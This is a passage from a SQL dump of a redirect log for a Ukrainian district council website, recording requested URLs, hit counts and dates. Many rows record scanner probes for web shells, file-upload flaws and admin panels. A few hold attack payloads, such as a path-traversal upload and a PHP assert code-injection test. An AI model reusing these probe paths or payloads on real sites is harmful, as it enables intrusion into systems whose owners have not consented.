00:00:00',301),(33233,'https://malyn-rayrada.gov.ua/cms/wp-admin/',NULL,'','',1,0,'2019-02-03 03:50:07','0000-00-00 00:00:00',301),(33234,'https://www.malyn-rayrada.gov.ua/index.php/1978-dopomozhemo-oksani-gergalo',NULL,'','',5,0,'2019-02-10 21:23:26','0000-00-00 00:00:00',301),(33235,'https://malyn-rayrada.gov.ua/wordpress/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/wordpress/wp-login.php','',11,0,'2019-02-13 01:29:37','0000-00-00 00:00:00',301),(33236,'https://malyn-rayrada.gov.ua/wp-content/plugins/gravityforms/',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/gravityforms/','',1,0,'2019-02-14 08:49:38','0000-00-00 00:00:00',301),(33237,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1689-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1689-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik','',10,0,'2019-02-14 19:04:19','0000-00-00 00:00:00',301),(33238,'https://malyn-rayrada.gov.ua/index.php/1681-vitaemo-iz-8-bereznya',NULL,'http://malyn-rayrada.gov.ua/index.php/1681-vitaemo-iz-8-bereznya','',2,0,'2019-02-15 02:28:45','0000-00-00 00:00:00',301),(33239,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1598-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1598-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji','',3,0,'2019-02-15 11:22:32','0000-00-00 00:00:00',301),(33240,'https://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/informuvannya-shchodo-konkursiv',NULL,'','',50,0,'2019-02-19 02:15:21','0000-00-00 00:00:00',301),(33241,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/ochishchennya-vladi',NULL,'','',95,0,'2019-02-19 07:59:28','0000-00-00 00:00:00',301),(33242,'https://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/ochishchennya-vladi',NULL,'','',29,0,'2019-02-19 19:01:54','0000-00-00 00:00:00',301),(33243,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/informuvannya-shchodo-konkursiv',NULL,'','',84,0,'2019-02-19 20:34:32','0000-00-00 00:00:00',301),(33244,'https://malyn-rayrada.gov.ua/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','',1,0,'2019-02-19 22:23:00','0000-00-00 00:00:00',301),(33245,'https://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/publichna-informacija_2?format=feed&type=rss',NULL,'','',1,0,'2019-02-20 06:17:32','0000-00-00 00:00:00',301),(33246,'https://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-07-07-54-47?format=feed&type=rss',NULL,'','',9,0,'2019-02-20 09:11:02','0000-00-00 00:00:00',301),(33247,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/publichna-informacija_2',NULL,'https://yandex.fr/','',156,0,'2019-02-20 11:36:16','0000-00-00 00:00:00',301),(33248,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/udd.php','',32,0,'2019-02-21 00:11:33','0000-00-00 00:00:00',301),(33249,'https://malyn-rayrada.gov.ua/index.php/1558-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-10-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'http://malyn-rayrada.gov.ua/index.php/1558-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-10-sesiyu-rajonnoji-radi-7-sklikannya','',1,0,'2019-02-21 07:20:38','0000-00-00 00:00:00',301),(33250,'https://malyn-rayrada.gov.ua/index.php/1612-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-14-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'http://malyn-rayrada.gov.ua/index.php/1612-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-14-sesiyu-rajonnoji-radi-7-sklikannya','',1,0,'2019-02-21 09:22:43','0000-00-00 00:00:00',301),(33251,'https://malyn-rayrada.gov.ua/forum/index.php',NULL,'','',2,0,'2019-02-21 11:37:20','0000-00-00 00:00:00',301),(33252,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2185-pro-rezultati-diyalnosti-korostishivskoji-mistsevoji-prokuraturi-na-teritoriji-malinskogo-rajonu?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2019-02-22 21:37:24','0000-00-00 00:00:00',301),(33253,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2185-pro-rezultati-diyalnosti-korostishivskoji-mistsevoji-prokuraturi-na-teritoriji-malinskogo-rajonu',NULL,'','',9,0,'2019-02-23 03:05:40','0000-00-00 00:00:00',301),(33254,'https://malyn-rayrada.gov.ua/wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','',1,0,'2019-02-23 05:59:29','0000-00-00 00:00:00',301),(33255,'https://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04?format=feed&type=atom',NULL,'','',4,0,'2019-02-23 13:22:30','0000-00-00 00:00:00',301),(33256,'https://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/publichna-informacija_2',NULL,'','',35,0,'2019-02-24 00:21:50','0000-00-00 00:00:00',301),(33257,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2185-pro-rezultati-diyalnosti-korostishivskoji-mistsevoji-prokuraturi-na-teritoriji-malinskogo-rajonu',NULL,'','',9,0,'2019-02-24 00:52:23','0000-00-00 00:00:00',301),(33258,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-07-07-54-47?format=feed&type=rss',NULL,'','',13,0,'2019-02-25 16:56:03','0000-00-00 00:00:00',301),(33259,'https://malyn-rayrada.gov.ua/index.php/1590-spivchuttya-kolezi',NULL,'','',2,0,'2019-02-26 02:47:01','0000-00-00 00:00:00',301),(33260,'https://malyn-rayrada.gov.ua/index.php/2178-do-vidoma-deputativ-malinskoji-rajonnoji-radi',NULL,'','',33,0,'2019-02-27 12:28:31','0000-00-00 00:00:00',301),(33261,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04?format=feed&type=atom',NULL,'','',2,0,'2019-02-27 13:56:36','0000-00-00 00:00:00',301),(33262,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04?format=feed&type=rss',NULL,'','',10,0,'2019-02-27 14:06:46','0000-00-00 00:00:00',301),(33263,'https://www.malyn-rayrada.gov.ua/index.php/2178-do-vidoma-deputativ-malinskoji-rajonnoji-radi',NULL,'','',13,0,'2019-03-01 01:49:18','0000-00-00 00:00:00',301),(33264,'https://malyn-rayrada.gov.ua/wordpress/wp-content/plugins/ubh/up.php',NULL,'','',1,0,'2019-03-01 06:20:02','0000-00-00 00:00:00',301),(33265,'https://malyn-rayrada.gov.ua//admin/login.php',NULL,'','',2,0,'2019-03-01 16:38:45','0000-00-00 00:00:00',301),(33266,'https://malyn-rayrada.gov.ua//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',2,0,'2019-03-01 16:40:55','0000-00-00 00:00:00',301),(33267,'https://malyn-rayrada.gov.ua//components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',2,0,'2019-03-01 16:42:45','0000-00-00 00:00:00',301),(33268,'https://malyn-rayrada.gov.ua//adminer.php',NULL,'','',4,0,'2019-03-03 12:05:55','0000-00-00 00:00:00',301),(33269,'https://malyn-rayrada.gov.ua/temp.php',NULL,'','',7,0,'2019-03-03 22:26:26','0000-00-00 00:00:00',301),(33270,'https://malyn-rayrada.gov.ua/index.php/1663-nekrolog',NULL,'','',5,0,'2019-03-05 08:13:50','0000-00-00 00:00:00',301),(33271,'https://www.malyn-rayrada.gov.ua/index.php/2192-zasidannya-kruglogo-stolu-na-temu-gotovnist-do-viplati-monetizatsiji-subsidij-ta-shchodo-provedennya-indeksatsiji-pensij-z-bereznya-2019-roku',NULL,'','',2,0,'2019-03-06 08:52:11','0000-00-00 00:00:00',301),(33272,'https://malyn-rayrada.gov.ua/feed',NULL,'http://malyn-rayrada.gov.ua/feed','',5,0,'2019-03-07 16:19:51','0000-00-00 00:00:00',301),(33273,'https://malyn-rayrada.gov.ua/rss',NULL,'http://malyn-rayrada.gov.ua/rss','',4,0,'2019-03-07 16:19:51','0000-00-00 00:00:00',301),(33274,'https://malyn-rayrada.gov.ua/atom',NULL,'http://malyn-rayrada.gov.ua/atom','',4,0,'2019-03-07 16:19:51','0000-00-00 00:00:00',301),(33275,'https://www.malyn-rayrada.gov.ua/index.php/1960-vitaemo-iz-svyatom-vesni-8-bereznya',NULL,'','',20,0,'2019-03-08 07:17:33','0000-00-00 00:00:00',301),(33276,'https://malyn-rayrada.gov.ua/attachments/article/2189/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ñ‚ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ 1.pdf',NULL,'','',2,0,'2019-03-09 19:07:15','0000-00-00 00:00:00',301),(33277,'https://malyn-rayrada.gov.ua/elfinder/php/connector.minimal.php',NULL,'','',3,0,'2019-03-11 21:08:06','0000-00-00 00:00:00',301),(33278,'https://malyn-rayrada.gov.ua/index.php/1960-vitaemo-iz-svyatom-vesni-8-bereznya',NULL,'','',34,0,'2019-03-14 05:22:34','0000-00-00 00:00:00',301),(33279,'https://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-07-07-54-47?format=feed&type=atom',NULL,'','',2,0,'2019-03-14 12:14:40','0000-00-00 00:00:00',301),(33280,'https://malyn-rayrada.gov.ua/wp-content/themes/satoshi/upload-file.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/satoshi/upload-file.php','',1,0,'2019-03-15 02:55:01','0000-00-00 00:00:00',301),(33281,'https://malyn-rayrada.gov.ua/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','',1,0,'2019-03-17 17:25:13','0000-00-00 00:00:00',301),(33282,'https://malyn-rayrada.gov.ua/wp-content/themes/thisway/includes/uploadify/upload_settings_image.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','',1,0,'2019-03-20 05:01:42','0000-00-00 00:00:00',301),(33283,'https://malyn-rayrada.gov.ua/attachments/article/2182/ð¿ð°ñ ð¿ð¾ñ€ñ‚.pdf',NULL,'','',2,0,'2019-03-20 17:08:18','0000-00-00 00:00:00',301),(33284,'https://malyn-rayrada.gov.ua/attachments/article/2182/ð¿ð°ñ ð¿ð¾ñ€ñ‚3.pdf',NULL,'','',2,0,'2019-03-20 17:50:00','0000-00-00 00:00:00',301),(33285,'https://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04?format=feed&type=rss',NULL,'','',10,0,'2019-03-20 17:55:59','0000-00-00 00:00:00',301),(33286,'https://malyn-rayrada.gov.ua/attachments/article/2182/ð¿ð°ñ ð¿ð¾ñ€ñ‚1.pdf',NULL,'','',2,0,'2019-03-20 18:42:14','0000-00-00 00:00:00',301),(33287,'https://malyn-rayrada.gov.ua/attachments/article/2182/ð¿ð°ñ ð¿ð¾ñ€ñ‚2.pdf',NULL,'','',2,0,'2019-03-20 19:09:23','0000-00-00 00:00:00',301),(33288,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2196-pro-ogoloshennya-v-mistsyakh-masovogo-rozmnozhennya-ta-viroshchuvannya-potomstva-dikimi-tvarinami-sezonu-tishi',NULL,'','',16,0,'2019-03-23 15:50:33','0000-00-00 00:00:00',301),(33289,'https://malyn-rayrada.gov.ua/wp-content/themes/dance-studio/core/libs/',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/dance-studio/core/libs/','',1,0,'2019-03-24 00:41:48','0000-00-00 00:00:00',301),(33290,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2196-pro-ogoloshennya-v-mistsyakh-masovogo-rozmnozhennya-ta-viroshchuvannya-potomstva-dikimi-tvarinami-sezonu-tishi',NULL,'','',24,0,'2019-03-24 05:44:19','0000-00-00 00:00:00',301),(33291,'https://www.malyn-rayrada.gov.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',1,0,'2019-03-24 11:51:46','0000-00-00 00:00:00',301),(33292,'https://www.malyn-rayrada.gov.ua/index.php?option=com_myblog&task=ajaxupload',NULL,'','',1,0,'2019-03-24 11:52:24','0000-00-00 00:00:00',301),(33293,'https://www.malyn-rayrada.gov.ua/images/stories/up.php',NULL,'','',2,0,'2019-03-24 11:53:54','0000-00-00 00:00:00',301),(33294,'https://www.malyn-rayrada.gov.ua/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',1,0,'2019-03-24 11:55:03','0000-00-00 00:00:00',301),(33295,'https://www.malyn-rayrada.gov.ua/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',1,0,'2019-03-24 11:55:09','0000-00-00 00:00:00',301),(33296,'https://malyn-rayrada.gov.ua/wp-content/themes/rightnow/includes/uploadify/upload_settings_image.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','',1,0,'2019-03-26 11:23:37','0000-00-00 00:00:00',301),(33297,'https://malyn-rayrada.gov.ua/assets/images/accesson.php',NULL,'','',2,0,'2019-03-29 09:56:47','0000-00-00 00:00:00',301),(33298,'https://malyn-rayrada.gov.ua/customizer.php',NULL,'','',3,0,'2019-03-30 23:41:20','0000-00-00 00:00:00',301),(33299,'https://malyn-rayrada.gov.ua//blog/',NULL,'http://malyn-rayrada.gov.ua/','',3,0,'2019-04-02 09:36:13','0000-00-00 00:00:00',301),(33300,'https://malyn-rayrada.gov.ua/log.php',NULL,'','',13,0,'2019-04-04 19:22:22','0000-00-00 00:00:00',301),(33301,'https://malyn-rayrada.gov.ua/wp-icoud.php',NULL,'','',6,0,'2019-04-05 22:49:33','0000-00-00 00:00:00',301),(33302,'https://malyn-rayrada.gov.ua/wp-ajax-hook.php',NULL,'','',3,0,'2019-04-08 06:38:46','0000-00-00 00:00:00',301),(33303,'https://malyn-rayrada.gov.ua/attachments/article/2209/ðÿð’ðÿð“.pdf',NULL,'','',5,0,'2019-04-08 18:48:23','0000-00-00 00:00:00',301),(33304,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-07-07-54-47?format=feed&type=atom',NULL,'','',4,0,'2019-04-09 02:35:59','0000-00-00 00:00:00',301),(33305,'https://malyn-rayrada.gov.ua/wp-content/plugins/temp.php',NULL,'','',1,0,'2019-04-09 09:36:55','0000-00-00 00:00:00',301),(33306,'https://malyn-rayrada.gov.ua/attachments/article/1866/ðšð¾ñˆñ‚ð¾ñ€ð¸ñ ð¸.pdf',NULL,'','',2,0,'2019-04-10 05:53:46','0000-00-00 00:00:00',301),(33307,'https://malyn-rayrada.gov.ua/components/com_foxcontact/lib/file-uploader.php?cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2019-04-10 11:46:41','0000-00-00 00:00:00',301),(33308,'https://malyn-rayrada.gov.ua/components/com_foxcontact/lib/uploader.php?cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2019-04-10 11:46:46','0000-00-00 00:00:00',301),(33309,'https://malyn-rayrada.gov.ua/bps.php',NULL,'','',1,0,'2019-04-10 12:27:10','0000-00-00 00:00:00',301),(33310,'https://malyn-rayrada.gov.ua/server/php/',NULL,'http://www.malyn-rayrada.gov.ua/server/php/','',4,0,'2019-04-10 18:25:19','0000-00-00 00:00:00',301),(33311,'https://malyn-rayrada.gov.ua/laura_of_the_coastal_fox_tribe_is_best_girl____/____make_the_harem_of_shy_fox_ladies_real____/____go_here_to_find_out_more____http://bit.ly/twokindsgeneral',NULL,'','',1,0,'2019-04-10 22:16:58','0000-00-00 00:00:00',301),(33312,'https://malyn-rayrada.gov.ua/laura_of_the_coastal_fox_tribe_is_best_girl____/____make_the_harem_of_shy_fox_ladies_real____/____a_message_from_twokinds_general_on_4chans_trash_board',NULL,'','',1,0,'2019-04-10 22:16:59','0000-00-00 00:00:00',301),(33313,'https://malyn-rayrada.gov.ua//webconfig.txt.php',NULL,'http://www.google.com.hk','',2,0,'2019-04-11 12:32:06','0000-00-00 00:00:00',301),(33314,'https://malyn-rayrada.gov.ua//user/register/?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'http://www.google.com.hk','',2,0,'2019-04-11 12:32:37','0000-00-00 00:00:00',301),(33315,'https://malyn-rayrada.gov.ua///webconfig.txt.php',NULL,'http://www.google.com.hk','',2,0,'2019-04-11 12:34:48','0000-00-00 00:00:00',301),(33316,'https://malyn-rayrada.gov.ua/seo_script.php',NULL,'','',6,0,'2019-04-11 15:57:00','0000-00-00 00:00:00',301),(33317,'https://malyn-rayrada.gov.ua/wp-content/plugins/complete-gallery-manager/frames/upload-images.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','',1,0,'2019-04-12 02:51:14','0000-00-00 00:00:00',301),(33318,'https://malyn-rayrada.gov.ua/wp-includes/images/hon2our.php',NULL,'','',1,0,'2019-04-12 20:06:58','0000-00-00 00:00:00',301),(33319,'https://malyn-rayrada.gov.ua/up.php',NULL,'','',12,0,'2019-04-13 20:58:58','0000-00-00 00:00:00',301),(33320,'https://malyn-rayrada.gov.ua/assets/images/seo_script.php',NULL,'','',1,0,'2019-04-13 23:15:27','0000-00-00 00:00:00',301),(33321,'https://malyn-rayrada.gov.ua/modules/homepageadvertise2/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/homepageadvertise2/uploadimage.php','',1,0,'2019-04-15 05:09:46','0000-00-00 00:00:00',301),(33322,'https://malyn-rayrada.gov.ua//phpmyadmin//',NULL,'http://malyn-rayrada.gov.ua//phpmyadmin//','',1,0,'2019-04-15 08:31:27','0000-00-00 00:00:00',301),(33323,'https://malyn-rayrada.gov.ua/license.php',NULL,'','',20,0,'2019-04-16 03:42:25','0000-00-00 00:00:00',301),(33324,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennja-vid-14122019-roku?start=7',NULL,'','',1,0,'2019-04-17 05:43:00','0000-00-00 00:00:00',301),(33325,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennja-vid-14122019-roku',NULL,'','',1,0,'2019-04-17 05:43:12','0000-00-00 00:00:00',301),(33326,'https://malyn-rayrada.gov.ua/yt.php',NULL,'','',5,0,'2019-04-17 07:23:07','0000-00-00 00:00:00',301),(33327,'https://malyn-rayrada.gov.ua/index.php/wp-login.php',NULL,'','',3,0,'2019-04-17 16:22:43','0000-00-00 00:00:00',301),(33328,'https://malyn-rayrada.gov.ua/wp-logos.php',NULL,'','',5,0,'2019-04-17 23:42:46','0000-00-00 00:00:00',301),(33329,'https://malyn-rayrada.gov.ua/modules/simpleslideshow/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/simpleslideshow/uploadimage.php','',2,0,'2019-04-18 04:08:50','0000-00-00 00:00:00',301),(33330,'https://malyn-rayrada.gov.ua/yt2.php',NULL,'','',5,0,'2019-04-18 07:14:52','0000-00-00 00:00:00',301),(33331,'https://malyn-rayrada.gov.ua/ytt.php',NULL,'','',5,0,'2019-04-18 13:31:33','0000-00-00 00:00:00',301),(33332,'https://malyn-rayrada.gov.ua/wp-cahce.php',NULL,'','',5,0,'2019-04-18 18:00:43','0000-00-00 00:00:00',301),(33333,'https://malyn-rayrada.gov.ua/modules/columnadverts/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/columnadverts/uploadimage.php','',2,0,'2019-04-20 02:28:29','0000-00-00 00:00:00',301),(33334,'https://malyn-rayrada.gov.ua/wp-feed.php',NULL,'','',4,0,'2019-04-20 03:48:15','0000-00-00 00:00:00',301),(33335,'https://malyn-rayrada.gov.ua/wp-logs.php?action=test',NULL,'','',4,0,'2019-04-20 07:16:20','0000-00-00 00:00:00',301),(33336,'https://malyn-rayrada.gov.ua/wp-register.php',NULL,'','',4,0,'2019-04-20 09:45:07','0000-00-00 00:00:00',301),(33337,'https://malyn-rayrada.gov.ua/wp-caches.php',NULL,'','',6,0,'2019-04-20 13:34:42','0000-00-00 00:00:00',301),(33338,'https://malyn-rayrada.gov.ua/cache.php',NULL,'','',6,0,'2019-04-20 17:12:41','0000-00-00 00:00:00',301),(33339,'https://malyn-rayrada.gov.ua/wp-rdf.php',NULL,'','',4,0,'2019-04-20 19:32:03','0000-00-00 00:00:00',301),(33340,'https://malyn-rayrada.gov.ua/modules/mod_feed/tmpl/mod_feed.php?ms-load=yjk5hg',NULL,'','',6,0,'2019-04-20 20:03:57','0000-00-00 00:00:00',301),(33341,'https://malyn-rayrada.gov.ua/lieats.php',NULL,'','',3,0,'2019-04-21 05:51:58','0000-00-00 00:00:00',301),(33342,'https://malyn-rayrada.gov.ua/xmlrpz.php',NULL,'','',8,0,'2019-04-21 11:15:43','0000-00-00 00:00:00',301),(33343,'https://malyn-rayrada.gov.ua/wp-version.php',NULL,'','',2,0,'2019-04-21 12:56:40','0000-00-00 00:00:00',301),(33344,'https://malyn-rayrada.gov.ua/xml.php',NULL,'','',5,0,'2019-04-21 21:35:09','0000-00-00 00:00:00',301),(33345,'https://malyn-rayrada.gov.ua/1.php',NULL,'','',12,0,'2019-04-21 23:45:13','0000-00-00 00:00:00',301),(33346,'https://malyn-rayrada.gov.ua/modx.php',NULL,'','',4,0,'2019-04-22 03:14:42','0000-00-00 00:00:00',301),(33347,'https://malyn-rayrada.gov.ua/modules/homepageadvertise/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/homepageadvertise/uploadimage.php','',1,0,'2019-04-22 06:02:03','0000-00-00 00:00:00',301),(33348,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-22',NULL,'','',1,0,'2019-04-22 07:42:36','0000-00-00 00:00:00',301),(33349,'https://www.malyn-rayrada.gov.ua/attachments/article/1638/ðÿð¾ñ–ð¼ðµð½ð½ðµ ð³ð¾ð»ð¾ññƒð²ð°ð½ð½ñ 14.pdf',NULL,'','',1,0,'2019-04-22 08:26:12','0000-00-00 00:00:00',301),(33350,'https://malyn-rayrada.gov.ua/index.php/1680-do-vidoma-deputativ-rajonnoji-radi',NULL,'','',1,0,'2019-04-22 09:25:22','0000-00-00 00:00:00',301),(33351,'https://malyn-rayrada.gov.ua/index.php/1040-do-uvagi-zhiteliv-malinskogo-rajonu',NULL,'','',1,0,'2019-04-22 09:30:51','0000-00-00 00:00:00',301),(33352,'https://malyn-rayrada.gov.ua/consystem.php',NULL,'','',2,0,'2019-04-22 10:07:13','0000-00-00 00:00:00',301),(33353,'https://malyn-rayrada.gov.ua/index.php/admin/',NULL,'http://malyn-rayrada.gov.ua/index.php/admin/','',1,0,'2019-04-22 15:21:35','0000-00-00 00:00:00',301),(33354,'https://malyn-rayrada.gov.ua/downloader/',NULL,'http://malyn-rayrada.gov.ua/downloader/','',1,0,'2019-04-22 15:21:36','0000-00-00 00:00:00',301),(33355,'https://malyn-rayrada.gov.ua/rss/catalog/notifystock/',NULL,'http://malyn-rayrada.gov.ua/rss/catalog/notifystock/','',1,0,'2019-04-22 15:21:37','0000-00-00 00:00:00',301),(33356,'https://malyn-rayrada.gov.ua/hivcxa.php',NULL,'','',3,0,'2019-04-22 17:48:30','0000-00-00 00:00:00',301),(33357,'https://malyn-rayrada.gov.ua/gtde.php',NULL,'','',1,0,'2019-04-22 20:56:51','0000-00-00 00:00:00',301),(33358,'https://malyn-rayrada.gov.ua/ghfhvvaw.php',NULL,'','',3,0,'2019-04-23 00:10:54','0000-00-00 00:00:00',301),(33359,'https://malyn-rayrada.gov.ua/smalls.php',NULL,'','',3,0,'2019-04-23 02:09:23','0000-00-00 00:00:00',301),(33360,'https://malyn-rayrada.gov.ua/shell.php',NULL,'','',16,0,'2019-04-23 03:44:04','0000-00-00 00:00:00',301),(33361,'https://malyn-rayrada.gov.ua/cod.php',NULL,'','',5,0,'2019-04-23 05:40:49','0000-00-00 00:00:00',301),(33362,'https://www.malyn-rayrada.gov.ua/attachments/article/2209/ðÿð’ðÿð“.pdf',NULL,'','',2,0,'2019-04-23 06:43:05','0000-00-00 00:00:00',301),(33363,'https://malyn-rayrada.gov.ua/writebab.php',NULL,'','',1,0,'2019-04-23 07:34:34','0000-00-00 00:00:00',301),(33364,'https://malyn-rayrada.gov.ua/webconfig.txt.php',NULL,'','',1,0,'2019-04-23 09:27:14','0000-00-00 00:00:00',301),(33365,'https://malyn-rayrada.gov.ua/versions.php',NULL,'','',1,0,'2019-04-23 12:54:00','0000-00-00 00:00:00',301),(33366,'https://malyn-rayrada.gov.ua/readme.php',NULL,'','',7,0,'2019-04-23 16:04:33','0000-00-00 00:00:00',301),(33367,'https://malyn-rayrada.gov.ua/modules/productpageadverts/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/productpageadverts/uploadimage.php','',1,0,'2019-04-24 02:11:56','0000-00-00 00:00:00',301),(33368,'https://malyn-rayrada.gov.ua/b.php',NULL,'','',3,0,'2019-04-24 02:16:04','0000-00-00 00:00:00',301),(33369,'https://malyn-rayrada.gov.ua/error.php',NULL,'','',9,0,'2019-04-24 04:00:45','0000-00-00 00:00:00',301),(33370,'https://malyn-rayrada.gov.ua/show.php?check=1',NULL,'','',3,0,'2019-04-24 05:46:45','0000-00-00 00:00:00',301),(33371,'https://malyn-rayrada.gov.ua/media/media.php?1=assert&2=die(pi()*42);',NULL,'','',5,0,'2019-04-24 10:55:23','0000-00-00 00:00:00',301),(33372,'https://malyn-rayrada.gov.ua/modules/mod_feed/tmpl/mod_feed.php?ms-load=tgyijk',NULL,'','',7,0,'2019-04-24 11:08:11','0000-00-00 00:00:00',301),(33373,'https://malyn-rayrada.gov.ua/configurationbak.php',NULL,'','',2,0,'2019-04-24 12:10:28','0000-00-00 00:00:00',301),(33374,'https://malyn-rayrada.gov.ua/sfn.php',NULL,'','',1,0,'2019-04-24 13:54:37','0000-00-00 00:00:00',301),(33375,'https://malyn-rayrada.gov.ua/phqmv.php',NULL,'','',1,0,'2019-04-24 16:53:15','0000-00-00 00:00:00',301),(33376,'https://malyn-rayrada.gov.ua/rsau.php',NULL,'','',1,0,'2019-04-24 18:31:37','0000-00-00 00:00:00',301),(33377,'https://malyn-rayrada.gov.ua/kup.php?u=1',NULL,'','',4,0,'2019-04-24 20:04:27','0000-00-00 00:00:00',301),(33378,'https://malyn-rayrada.gov.ua/wp-checking.php',NULL,'','',1,0,'2019-04-24 23:23:53','0000-00-00 00:00:00',301),(33379,'https://malyn-rayrada.gov.ua/phpinfoer.php',NULL,'','',1,0,'2019-04-25 04:34:45','0000-00-00 00:00:00',301),(33380,'https://malyn-rayrada.gov.ua/cache/cachee.php',NULL,'','',5,0,'2019-04-25 06:52:06','0000-00-00 00:00:00',301),(33381,'https://malyn-rayrada.gov.ua/xmlrpc-blog.php',NULL,'','',2,0,'2019-04-25 08:05:13','0000-00-00 00:00:00',301),(33382,'https://malyn-rayrada.gov.ua/sys.php.php',NULL,'','',3,0,'2019-04-25 09:50:00','0000-00-00 00:00:00',301),(33383,'https://malyn-rayrada.gov.ua/wp-blog-config.php',NULL,'','',1,0,'2019-04-25 11:44:27','0000-00-00 00:00:00',301),(33384,'https://malyn-rayrada.gov.ua/code.php.php',NULL,'','',1,0,'2019-04-25 16:28:10','0000-00-00 00:00:00',301),(33385,'https://malyn-rayrada.gov.ua/info.php',NULL,'','',15,0,'2019-04-25 19:49:03','0000-00-00 00:00:00',301),(33386,'https://malyn-rayrada.gov.ua/wp-cson.php?canshu=1',NULL,'','',1,0,'2019-04-25 21:24:12','0000-00-00 00:00:00',301),(33387,'https://malyn-rayrada.gov.ua/cache/seo_script.php',NULL,'','',1,0,'2019-04-26 00:46:24','0000-00-00 00:00:00',301),(33388,'https://malyn-rayrada.gov.ua/camille.php',NULL,'','',1,0,'2019-04-26 06:00:05','0000-00-00 00:00:00',301),(33389,'https://malyn-rayrada.gov.ua/unz.php',NULL,'','',2,0,'2019-04-26 07:42:38','0000-00-00 00:00:00',301),(33390,'https://malyn-rayrada.gov.ua/wp-main.php',NULL,'','',3,0,'2019-04-26 09:21:03','0000-00-00 00:00:00',301),(33391,'https://malyn-rayrada.gov.ua/wp-includse.php?script=1',NULL,'','',2,0,'2019-04-26 11:13:54','0000-00-00 